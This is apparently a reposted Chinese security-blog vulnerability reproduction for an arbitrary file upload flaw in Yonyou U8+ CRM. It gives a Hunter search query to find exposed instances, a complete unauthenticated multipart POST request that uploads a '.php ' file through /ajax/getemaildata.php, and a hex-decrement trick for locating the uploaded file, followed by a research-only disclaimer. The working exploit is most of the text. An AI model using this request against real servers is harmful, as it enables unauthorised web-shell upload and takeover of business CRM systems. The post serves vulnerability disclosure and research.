产品简介:用友U8+CRM客户关系管理软件适用于中大型企业,用友U8+CRM是以用友TurboCRM7.2SP2为功能蓝本,在U8产品基础上增加了完整的CRM模块,进一步提高用友U8产品的功能融合,提高产品的客户满意度。
hunter:web.body="用友U8CRM"
回显得到文件路径:www\tmpfile\mhtC1D6.tmp.mht将得到的C1D6进行十六进制转换:43314436将43314436减一得到43314435将43314435进行字符串转换得到C1D5最终文件访问路径:/tmpfile/updC1D5.tmp.php
Poc
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1 Host: 192.168.30.100:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ Content-Length: 199 ------WebKitFormBoundarykS5RKgl8t3nwInMQ Content-Disposition: form-data; name="file"; filename="1.php " Content-Type: text/plain test12345678 ------WebKitFormBoundarykS5RKgl8t3nwInMQ
原文始发于微信公众号(安全小圈):漏洞复现 用友U8+CRM任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论